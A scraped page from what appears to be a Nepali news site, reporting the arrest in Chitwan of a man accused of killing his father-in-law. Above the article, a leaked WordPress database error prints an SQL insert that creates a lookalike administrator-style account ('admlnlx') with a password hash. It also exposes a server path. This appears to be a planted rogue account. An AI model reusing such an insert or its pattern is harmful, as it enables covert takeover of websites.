WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOf6B.aoDvZOLY40g0MFy7Znv.FZ1k1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:09:30', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
ससुराको हत्या गर्ने ज्वाँर्ई चितवनबाट पक्राउ – Gaule Khabar

ससुराको हत्या गर्ने ज्वाँर्ई चितवनबाट पक्राउ

ससुराको हत्या गर्ने ज्वाँर्ई चितवनबाट पक्राउ

चितवन, मंसिर १८–

पर्सा जिल्लामा ससुराको हत्या गर्ने ज्वाँई चितवनको रत्ननगरबाट पक्राउ परेका छन् । भरतपुर उपमहानगरपालिका ३ घर भइ हाल पर्सा जिल्ला बिरुवागुठी १ रामाटोलमा बस्ने शेर बहादुर पहारिलाइ ससुराको हत्या आरोपमा इलाका प्रहरी कार्यालय टाँडीले पकाउ गरेको आजको कायाकैरन दैनिकमा खबर छ ।

यहि मंसिर १२ गते ससुरा ८३ बर्सिय धनबहादुर मगरको हत्या पछि फरार भएका थिए । घटना पस्चात फरार अभियुक्त पहारी रत्ननगर १२ सुब्बा चोकमा लुकेर बसेका थिए । पक्राउ परेका पहारिलाइ बिहिबारनै इलाका प्रहरी कार्यालय पोखरिया पठाइएको इलाका प्रहरी कार्यालय टाँडीका प्रहरी नायब उपरीक्षक नारायण रञ्जितकारले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका